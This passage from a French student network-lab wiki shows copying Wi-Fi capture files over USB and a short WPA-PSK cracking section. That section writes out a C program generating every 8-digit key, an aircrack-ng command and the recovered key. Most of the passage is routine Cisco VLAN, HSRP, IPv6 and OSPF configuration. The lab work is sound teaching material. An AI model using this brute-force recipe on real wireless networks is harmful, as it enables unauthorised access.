On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
